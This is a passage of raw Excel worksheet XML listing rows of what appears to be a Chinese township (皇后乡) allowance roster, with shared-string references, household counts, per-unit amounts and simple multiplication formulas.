      <c r="H2043" s="14">
        <v>300</v>
      </c>
      <c r="I2043" s="14">
        <f>H2043*G2043</f>
        <v>600</v>
      </c>
      <c r="J2043" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2043" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2044" ht="23" customHeight="1" spans="1:11">
      <c r="A2044" s="13" t="s">
        <v>5420</v>
      </c>
      <c r="B2044" s="14" t="str">
        <f>B2043</f>
        <v>皇后乡</v>
      </c>
      <c r="C2044" s="14" t="str">
        <f>C2043</f>
        <v>皇后乡</v>
      </c>
      <c r="D2044" s="13" t="s">
        <v>5421</v>
      </c>
      <c r="E2044" s="13" t="s">
        <v>5422</v>
      </c>
      <c r="F2044" s="14" t="str">
        <f>F2043</f>
        <v>4113210615</v>
      </c>
      <c r="G2044" s="14"/>
      <c r="H2044" s="14"/>
      <c r="I2044" s="14"/>
      <c r="J2044" s="14"/>
      <c r="K2044" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2045" ht="23" customHeight="1" spans="1:11">
      <c r="A2045" s="13" t="s">
        <v>5423</v>
      </c>
      <c r="B2045" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2045" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2045" s="14" t="s">
        <v>5424</v>
      </c>
      <c r="E2045" s="14" t="s">
        <v>5425</v>
      </c>
      <c r="F2045" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2045" s="14">
        <v>2</v>
      </c>
      <c r="H2045" s="14">
        <v>320</v>
      </c>
      <c r="I2045" s="14">
        <f>H2045*G2045</f>
        <v>640</v>
      </c>
      <c r="J2045" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2045" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2046" ht="23" customHeight="1" spans="1:11">
      <c r="A2046" s="13" t="s">
        <v>5426</v>
      </c>
      <c r="B2046" s="14" t="str">
        <f>B2045</f>
        <v>皇后乡</v>
      </c>
      <c r="C2046" s="14" t="str">
        <f>C2045</f>
        <v>皇后乡</v>
      </c>
      <c r="D2046" s="13" t="s">
        <v>5427</v>
      </c>
      <c r="E2046" s="14" t="s">
        <v>5428</v>
      </c>
      <c r="F2046" s="14" t="str">
        <f>F2045</f>
        <v>4113210615</v>
      </c>
      <c r="G2046" s="14"/>
      <c r="H2046" s="14"/>
      <c r="I2046" s="14"/>
      <c r="J2046" s="14"/>
      <c r="K2046" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2047" ht="23" customHeight="1" spans="1:11">
      <c r="A2047" s="13" t="s">
        <v>5429</v>
      </c>
      <c r="B2047" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2047" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2047" s="14" t="s">
        <v>5430</v>
      </c>
      <c r="E2047" s="14" t="s">
        <v>4995</v>
      </c>
      <c r="F2047" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2047" s="14">
        <v>1</v>
      </c>
      <c r="H2047" s="14">
        <v>340</v>
      </c>
      <c r="I2047" s="14">
        <f>H2047*G2047</f>
        <v>340</v>
      </c>
      <c r="J2047" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2047" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2048" ht="23" customHeight="1" spans="1:11">
      <c r="A2048" s="13" t="s">
        <v>5431</v>
      </c>
      <c r="B2048" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2048" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2048" s="14" t="s">
        <v>5432</v>
      </c>
      <c r="E2048" s="14" t="s">
        <v>3636</v>
      </c>
      <c r="F2048" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2048" s="14">
        <v>2</v>
      </c>
      <c r="H2048" s="14">
        <v>320</v>
      </c>
      <c r="I2048" s="14">
        <f>H2048*G2048</f>
        <v>640</v>
      </c>
      <c r="J2048" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2048" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2049" ht="23" customHeight="1" spans="1:11">
      <c r="A2049" s="13" t="s">
        <v>5433</v>
      </c>
      <c r="B2049" s="14" t="str">
        <f>B2048</f>
        <v>皇后乡</v>
      </c>
      <c r="C2049" s="14" t="str">
        <f>C2048</f>
        <v>皇后乡</v>
      </c>
      <c r="D2049" s="13" t="s">
        <v>5434</v>
      </c>
      <c r="E2049" s="14" t="s">
        <v>4930</v>
      </c>
      <c r="F2049" s="14" t="str">
        <f>F2048</f>
        <v>4113210615</v>
      </c>
      <c r="G2049" s="14"/>
      <c r="H2049" s="14"/>
      <c r="I2049" s="14"/>
      <c r="J2049" s="14"/>
      <c r="K2049" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2050" ht="23" customHeight="1" spans="1:11">
      <c r="A2050" s="13" t="s">
        <v>5435</v>
      </c>
      <c r="B2050" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2050" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2050" s="14" t="s">
        <v>5436</v>
      </c>
      <c r="E2050" s="14" t="s">
        <v>5437</v>
      </c>
      <c r="F2050" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2050" s="14">
        <v>1</v>
      </c>
      <c r="H2050" s="14">
        <v>340</v>
      </c>
      <c r="I2050" s="14">
        <f>H2050*G2050</f>
        <v>340</v>
      </c>
      <c r="J2050" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2050" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2051" ht="23" customHeight="1" spans="1:11">
      <c r="A2051" s="13" t="s">
        <v>5438</v>
      </c>
      <c r="B2051" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2051" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2051" s="14" t="s">
        <v>5439</v>
      </c>
      <c r="E2051" s="14" t="s">
        <v>5282</v>
      </c>
      <c r="F2051" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2051" s="14">
        <v>1</v>
      </c>
      <c r="H2051" s="14">
        <v>340</v>
      </c>
      <c r="I2051" s="14">
        <f>H2051*G2051</f>
        <v>340</v>
      </c>
      <c r="J2051" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2051" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2052" ht="23" customHeight="1" spans="1:11">
      <c r="A2052" s="13" t="s">
        <v>5440</v>
      </c>
      <c r="B2052" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2052" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2052" s="14" t="s">
        <v>5441</v>
      </c>
      <c r="E2052" s="14" t="s">
        <v>5442</v>
      </c>
      <c r="F2052" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2052" s="14">
        <v>4</v>
      </c>
      <c r="H2052" s="14">
        <v>260</v>
      </c>
      <c r="I2052" s="14">
        <f>H2052*G2052</f>
        <v>1040</v>
      </c>
      <c r="J2052" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2052" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2053" ht="23" customHeight="1" spans="1:11">
      <c r="A2053" s="13" t="s">
        <v>5443</v>
      </c>
      <c r="B2053" s="14" t="str">
        <f>B2052</f>
        <v>皇后乡</v>
      </c>
      <c r="C2053" s="14" t="str">
        <f>C2052</f>
        <v>皇后乡</v>
      </c>
      <c r="D2053" s="13" t="s">
        <v>5444</v>
      </c>
      <c r="E2053" s="14" t="s">
        <v>5445</v>
      </c>
      <c r="F2053" s="14" t="str">
        <f>F2052</f>
        <v>4113210615</v>
      </c>
      <c r="G2053" s="14"/>
      <c r="H2053" s="14"/>
      <c r="I2053" s="14"/>
      <c r="J2053" s="14"/>
      <c r="K2053" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2054" ht="23" customHeight="1" spans="1:11">
      <c r="A2054" s="13" t="s">
        <v>5446</v>
      </c>
      <c r="B2054" s="14" t="str">
        <f>B2053</f>
        <v>皇后乡</v>
      </c>
      <c r="C2054" s="14" t="str">
        <f>C2053</f>
        <v>皇后乡</v>
      </c>
      <c r="D2054" s="18" t="s">
        <v>5447</v>
      </c>
      <c r="E2054" s="15" t="s">
        <v>5448</v>
      </c>
      <c r="F2054" s="14" t="str">
        <f>F2053</f>
        <v>4113210615</v>
      </c>
      <c r="G2054" s="14"/>
      <c r="H2054" s="14"/>
      <c r="I2054" s="14"/>
      <c r="J2054" s="14"/>
      <c r="K2054" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2055" ht="23" customHeight="1" spans="1:11">
      <c r="A2055" s="13" t="s">
        <v>5449</v>
      </c>
      <c r="B2055" s="14" t="str">
        <f>B2054</f>
        <v>皇后乡</v>
      </c>
      <c r="C2055" s="14" t="str">
        <f>C2054</f>
        <v>皇后乡</v>
      </c>
      <c r="D2055" s="18" t="s">
        <v>5450</v>
      </c>
      <c r="E2055" s="15" t="s">
        <v>2109</v>
      </c>
      <c r="F2055" s="14" t="str">
        <f>F2054</f>
        <v>4113210615</v>
      </c>
      <c r="G2055" s="14"/>
      <c r="H2055" s="14"/>
      <c r="I2055" s="14"/>
      <c r="J2055" s="14"/>
      <c r="K2055" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2056" ht="23" customHeight="1" spans="1:11">
      <c r="A2056" s="13" t="s">
        <v>5451</v>
      </c>
      <c r="B2056" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2056" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2056" s="14" t="s">
        <v>5452</v>
      </c>
      <c r="E2056" s="14" t="s">
        <v>4930</v>
      </c>
      <c r="F2056" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2056" s="14">
        <v>1</v>
      </c>
      <c r="H2056" s="14">
        <v>340</v>
      </c>
      <c r="I2056" s="14">
        <f t="shared" ref="I2056:I2062" si="101">H2056*G2056</f>
        <v>340</v>
      </c>
      <c r="J2056" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2056" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2057" ht="23" customHeight="1" spans="1:11">
      <c r="A2057" s="13" t="s">
        <v>5453</v>
      </c>
      <c r="B2057" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2057" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2057" s="14" t="s">
        <v>5454</v>
      </c>
      <c r="E2057" s="14" t="s">
        <v>4945</v>
      </c>
      <c r="F2057" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2057" s="14">
        <v>1</v>
      </c>
      <c r="H2057" s="14">
        <v>340</v>
      </c>
      <c r="I2057" s="14">
        <f t="shared" si="101"/>
        <v>340</v>
      </c>
      <c r="J2057" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2057" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2058" ht="23" customHeight="1" spans="1:11">
      <c r="A2058" s="13" t="s">
        <v>5455</v>
      </c>
      <c r="B2058" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2058" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2058" s="14" t="s">
        <v>5456</v>
      </c>
      <c r="E2058" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F2058" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2058" s="14">
        <v>1</v>
      </c>
      <c r="H2058" s="14">
        <v>340</v>
      </c>
      <c r="I2058" s="14">
        <f t="shared" si="101"/>
        <v>340</v>
      </c>
      <c r="J2058" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2058" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2059" ht="23" customHeight="1" spans="1:11">
      <c r="A2059" s="13" t="s">
        <v>5457</v>
      </c>
      <c r="B2059" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2059" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2059" s="14" t="s">
        <v>5458</v>
      </c>
      <c r="E2059" s="14" t="s">
        <v>5015</v>
      </c>
      <c r="F2059" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2059" s="14">
        <v>1</v>
      </c>
      <c r="H2059" s="14">
        <v>340</v>
      </c>
      <c r="I2059" s="14">
        <f t="shared" si="101"/>
        <v>340</v>
      </c>
      <c r="J2059" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2059" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2060" ht="23" customHeight="1" spans="1:11">
      <c r="A2060" s="13" t="s">
        <v>5459</v>
      </c>
      <c r="B2060" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2060" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2060" s="14" t="s">
        <v>5460</v>
      </c>
      <c r="E2060" s="14" t="s">
        <v>4984</v>
      </c>
      <c r="F2060" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2060" s="14">
        <v>1</v>
      </c>
      <c r="H2060" s="14">
        <v>340</v>
      </c>
      <c r="I2060" s="14">
        <f t="shared" si="101"/>
        <v>340</v>
      </c>
      <c r="J2060" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2060" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2061" ht="23" customHeight="1" spans="1:11">
      <c r="A2061" s="13" t="s">
        <v>5461</v>
      </c>
      <c r="B2061" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2061" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2061" s="14" t="s">
        <v>5462</v>
      </c>
      <c r="E2061" s="14" t="s">
        <v>4927</v>
      </c>
      <c r="F2061" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2061" s="14">
        <v>1</v>
      </c>
      <c r="H2061" s="14">
        <v>340</v>
      </c>
      <c r="I2061" s="14">
        <f t="shared" si="101"/>
        <v>340</v>
      </c>
      <c r="J2061" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2061" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2062" ht="23" customHeight="1" spans="1:11">
      <c r="A2062" s="13" t="s">
        <v>5463</v>
      </c>
      <c r="B2062" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2062" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2062" s="14" t="s">
        <v>5464</v>
      </c>
      <c r="E2062" s="14" t="s">
        <v>4916</v>
      </c>
      <c r="F2062" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2062" s="14">
        <v>2</v>
      </c>
      <c r="H2062" s="14">
        <v>300</v>
      </c>
      <c r="I2062" s="14">
        <f t="shared" si="101"/>
        <v>600</v>
      </c>
      <c r="J2062" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2062" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2063" ht="23" customHeight="1" spans="1:11">
      <c r="A2063" s="13" t="s">
        <v>5465</v>
      </c>
      <c r="B2063" s="14" t="str">
        <f>B2062</f>
        <v>皇后乡</v>
      </c>
      <c r="C2063" s="14" t="str">
        <f>C2062</f>
        <v>皇后乡</v>
      </c>
      <c r="D2063" s="19" t="s">
        <v>5466</v>
      </c>
      <c r="E2063" s="19" t="s">
        <v>5087</v>
      </c>
      <c r="F2063" s="14" t="str">
        <f>F2062</f>
        <v>4113210615</v>
      </c>
      <c r="G2063" s="14"/>
      <c r="H2063" s="14"/>
      <c r="I2063" s="14"/>
      <c r="J2063" s="14"/>
      <c r="K2063" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2064" ht="23" customHeight="1" spans="1:11">
      <c r="A2064" s="13" t="s">
        <v>5467</v>
      </c>
      <c r="B2064" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2064" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2064" s="14" t="s">
        <v>5468</v>
      </c>
      <c r="E2064" s="14" t="s">
        <v>5469</v>
      </c>
      <c r="F2064" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2064" s="14">
        <v>1</v>
      </c>
      <c r="H2064" s="14">
        <v>340</v>
      </c>
      <c r="I2064" s="14">
        <f>H2064*G2064</f>
        <v>340</v>
      </c>
      <c r="J2064" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2064" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2065" ht="23" customHeight="1" spans="1:11">
      <c r="A2065" s="13" t="s">
        <v>5470</v>
      </c>
      <c r="B2065" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2065" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2065" s="14" t="s">
        <v>5471</v>
      </c>
      <c r="E2065" s="14" t="s">
        <v>5472</v>
      </c>
      <c r="F2065" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2065" s="14">
        <v>3</v>
      </c>
      <c r="H2065" s="14">
        <v>265</v>
      </c>
      <c r="I2065" s="14">
        <f>H2065*G2065</f>
        <v>795</v>
      </c>
      <c r="J2065" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2065" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2066" ht="23" customHeight="1" spans="1:11">
      <c r="A2066" s="13" t="s">
        <v>5473</v>
      </c>
      <c r="B2066" s="14" t="str">
        <f>B2065</f>
        <v>皇后乡</v>
      </c>
      <c r="C2066" s="14" t="str">
        <f>C2065</f>
        <v>皇后乡</v>
      </c>
      <c r="D2066" s="13" t="s">
        <v>5474</v>
      </c>
      <c r="E2066" s="13" t="s">
        <v>5475</v>
      </c>
      <c r="F2066" s="14" t="str">
        <f>F2065</f>
        <v>4113210615</v>
      </c>
      <c r="G2066" s="14"/>
      <c r="H2066" s="14"/>
      <c r="I2066" s="14"/>
      <c r="J2066" s="14"/>
      <c r="K2066" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2067" ht="23" customHeight="1" spans="1:11">
      <c r="A2067" s="13" t="s">
        <v>5476</v>
      </c>
      <c r="B2067" s="14" t="str">
        <f>B2066</f>
        <v>皇后乡</v>
      </c>
      <c r="C2067" s="14" t="str">
        <f>C2066</f>
        <v>皇后乡</v>
      </c>
      <c r="D2067" s="13" t="s">
        <v>5477</v>
      </c>
      <c r="E2067" s="19" t="s">
        <v>5478</v>
      </c>
      <c r="F2067" s="14" t="str">
        <f>F2066</f>
        <v>4113210615</v>
      </c>
      <c r="G2067" s="14"/>
      <c r="H2067" s="14"/>
      <c r="I2067" s="14"/>
      <c r="J2067" s="14"/>
      <c r="K2067" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2068" ht="23" customHeight="1" spans="1:11">
      <c r="A2068" s="13" t="s">
        <v>5479</v>
      </c>
      <c r="B2068" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2068" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2068" s="14" t="s">
        <v>5480</v>
      </c>
      <c r="E2068" s="14" t="s">
        <v>5034</v>
      </c>
      <c r="F2068" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2068" s="14">
        <v>1</v>
      </c>
      <c r="H2068" s="14">
        <v>340</v>
      </c>
      <c r="I2068" s="14">
        <f t="shared" ref="I2068:I2073" si="102">H2068*G2068</f>
        <v>340</v>
      </c>
      <c r="J2068" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2068" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2069" ht="23" customHeight="1" spans="1:11">
      <c r="A2069" s="13" t="s">
        <v>5481</v>
      </c>
      <c r="B2069" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2069" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2069" s="14" t="s">
        <v>5482</v>
      </c>
      <c r="E2069" s="14" t="s">
        <v>4981</v>
      </c>
      <c r="F2069" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2069" s="14">
        <v>1</v>
      </c>
      <c r="H2069" s="14">
        <v>340</v>
      </c>
      <c r="I2069" s="14">
        <f t="shared" si="102"/>
        <v>340</v>
      </c>
      <c r="J2069" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2069" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2070" ht="23" customHeight="1" spans="1:11">
      <c r="A2070" s="13" t="s">
        <v>5483</v>
      </c>
      <c r="B2070" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2070" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2070" s="14" t="s">
        <v>5484</v>
      </c>
      <c r="E2070" s="14" t="s">
        <v>5154</v>
      </c>
      <c r="F2070" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2070" s="14">
        <v>1</v>
      </c>
      <c r="H2070" s="14">
        <v>340</v>
      </c>
      <c r="I2070" s="14">
        <f t="shared" si="102"/>
        <v>340</v>
      </c>
      <c r="J2070" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2070" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2071" ht="23" customHeight="1" spans="1:11">
      <c r="A2071" s="13" t="s">
        <v>5485</v>
      </c>
      <c r="B2071" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2071" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2071" s="14" t="s">
        <v>5486</v>
      </c>
      <c r="E2071" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F2071" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2071" s="14">
        <v>1</v>
      </c>
      <c r="H2071" s="14">
        <v>340</v>
      </c>
      <c r="I2071" s="14">
        <f t="shared" si="102"/>
        <v>340</v>
      </c>
      <c r="J2071" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2071" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2072" ht="23" customHeight="1" spans="1:11">
      <c r="A2072" s="13" t="s">
        <v>5487</v>
      </c>
      <c r="B2072" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2072" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2072" s="14" t="s">
        <v>5488</v>
      </c>
      <c r="E2072" s="14" t="s">
        <v>5282</v>
      </c>
      <c r="F2072" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2072" s="14">
        <v>1</v>
      </c>
      <c r="H2072" s="14">
        <v>340</v>
      </c>
      <c r="I2072" s="14">
        <f t="shared" si="102"/>
        <v>340</v>
      </c>
      <c r="J2072" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2072" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2073" ht="23" customHeight="1" spans="1:11">
      <c r="A2073" s="13" t="s">
        <v>5489</v>
      </c>
      <c r="B2073" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2073" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2073" s="14" t="s">
        <v>5490</v>
      </c>
      <c r="E2073" s="14" t="s">
        <v>5491</v>
      </c>
      <c r="F2073" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2073" s="14">
        <v>2</v>
      </c>
      <c r="H2073" s="14">
        <v>300</v>
      </c>
      <c r="I2073" s="14">
        <f t="shared" si="102"/>
        <v>600</v>
      </c>
      <c r="J2073" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2073" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2074" ht="23" customHeight="1" spans="1:11">
      <c r="A2074" s="13" t="s">
        <v>5492</v>
      </c>
      <c r="B2074" s="14" t="str">
        <f>B2073</f>
        <v>皇后乡</v>
      </c>
      <c r="C2074" s="14" t="str">
        <f>C2073</f>
        <v>皇后乡</v>
      </c>
      <c r="D2074" s="13" t="s">
        <v>5493</v>
      </c>
      <c r="E2074" s="13" t="s">
        <v>5494</v>
      </c>
      <c r="F2074" s="14" t="str">
        <f>F2073</f>
        <v>4113210615</v>
      </c>
      <c r="G2074" s="14"/>
      <c r="H2074" s="14"/>
      <c r="I2074" s="14"/>
      <c r="J2074" s="14"/>
      <c r="K2074" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2075" ht="23" customHeight="1" spans="1:11">
      <c r="A2075" s="13" t="s">
        <v>5495</v>
      </c>
      <c r="B2075" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2075" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2075" s="14" t="s">
        <v>5496</v>
      </c>
      <c r="E2075" s="14" t="s">
        <v>4893</v>
      </c>
      <c r="F2075" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2075" s="14">
        <v>1</v>
      </c>
      <c r="H2075" s="14">
        <v>340</v>
      </c>
      <c r="I2075" s="14">
        <f>H2075*G2075</f>
        <v>340</v>
      </c>
      <c r="J2075" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2075" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2076" ht="23" customHeight="1" spans="1:11">
      <c r="A2076" s="13" t="s">
        <v>5497</v>
      </c>
      <c r="B2076" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2076" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2076" s="14" t="s">
        <v>5498</v>
      </c>
      <c r="E2076" s="14" t="s">
        <v>5133</v>
      </c>
      <c r="F2076" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2076" s="14">
        <v>2</v>
      </c>
      <c r="H2076" s="14">
        <v>300</v>
      </c>
      <c r="I2076" s="14">
        <f>H2076*G2076</f>
        <v>600</v>
      </c>
      <c r="J2076" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2076" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2077" ht="23" customHeight="1" spans="1:11">
      <c r="A2077" s="13" t="s">
        <v>5499</v>
      </c>
      <c r="B2077" s="14" t="str">
        <f>B2076</f>
        <v>皇后乡</v>
      </c>
      <c r="C2077" s="14" t="str">
        <f>C2076</f>
        <v>皇后乡</v>
      </c>
      <c r="D2077" s="13" t="s">
        <v>5500</v>
      </c>
      <c r="E2077" s="13" t="s">
        <v>5501</v>
      </c>
      <c r="F2077" s="14" t="str">
        <f>F2076</f>
        <v>4113210615</v>
      </c>
      <c r="G2077" s="14"/>
      <c r="H2077" s="14"/>
      <c r="I2077" s="14"/>
      <c r="J2077" s="14"/>
      <c r="K2077" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2078" ht="23" customHeight="1" spans="1:11">
      <c r="A2078" s="13" t="s">
        <v>5502</v>
      </c>
      <c r="B2078" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2078" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2078" s="14" t="s">
        <v>5503</v>
      </c>
      <c r="E2078" s="14" t="s">
        <v>5478</v>
      </c>
      <c r="F2078" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2078" s="14">
        <v>1</v>
      </c>
      <c r="H2078" s="14">
        <v>340</v>
      </c>
      <c r="I2078" s="14">
        <f>H2078*G2078</f>
        <v>340</v>
      </c>
      <c r="J2078" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2078" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2079" ht="23" customHeight="1" spans="1:11">
      <c r="A2079" s="13" t="s">
        <v>5504</v>
      </c>
      <c r="B2079" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2079" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2079" s="14" t="s">
        <v>5505</v>
      </c>
      <c r="E2079" s="14" t="s">
        <v>5356</v>
      </c>
      <c r="F2079" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2079" s="14">
        <v>2</v>
      </c>
      <c r="H2079" s="14">
        <v>300</v>
      </c>
      <c r="I2079" s="14">
        <f>H2079*G2079</f>
        <v>600</v>
      </c>
      <c r="J2079" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2079" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2080" ht="23" customHeight="1" spans="1:11">
      <c r="A2080" s="13" t="s">
        <v>5506</v>
      </c>
      <c r="B2080" s="14" t="str">
        <f>B2079</f>
        <v>皇后乡</v>
      </c>
      <c r="C2080" s="14" t="str">
        <f>C2079</f>
        <v>皇后乡</v>
      </c>
      <c r="D2080" s="13" t="s">
        <v>5507</v>
      </c>
      <c r="E2080" s="13" t="s">
        <v>5508</v>
      </c>
      <c r="F2080" s="14" t="str">
        <f>F2079</f>
        <v>4113210615</v>
      </c>
      <c r="G2080" s="14"/>
      <c r="H2080" s="14"/>
      <c r="I2080" s="14"/>
      <c r="J2080" s="14"/>
      <c r="K2080" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2081" ht="23" customHeight="1" spans="1:11">
      <c r="A2081" s="13" t="s">
        <v>5509</v>
      </c>
      <c r="B2081" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2081" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2081" s="14" t="s">
        <v>5510</v>
      </c>
      <c r="E2081" s="14" t="s">
        <v>5119</v>
      </c>
      <c r="F2081" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2081" s="14">
        <v>2</v>
      </c>
      <c r="H2081" s="14">
        <v>300</v>
      </c>
      <c r="I2081" s="14">
        <f>H2081*G2081</f>
        <v>600</v>
      </c>
      <c r="J2081" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2081" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2082" ht="23" customHeight="1" spans="1:11">
      <c r="A2082" s="13" t="s">
        <v>5511</v>
      </c>
      <c r="B2082" s="14" t="str">
        <f>B2081</f>
        <v>皇后乡</v>
      </c>
      <c r="C2082" s="14" t="str">
        <f>C2081</f>
        <v>皇后乡</v>
      </c>
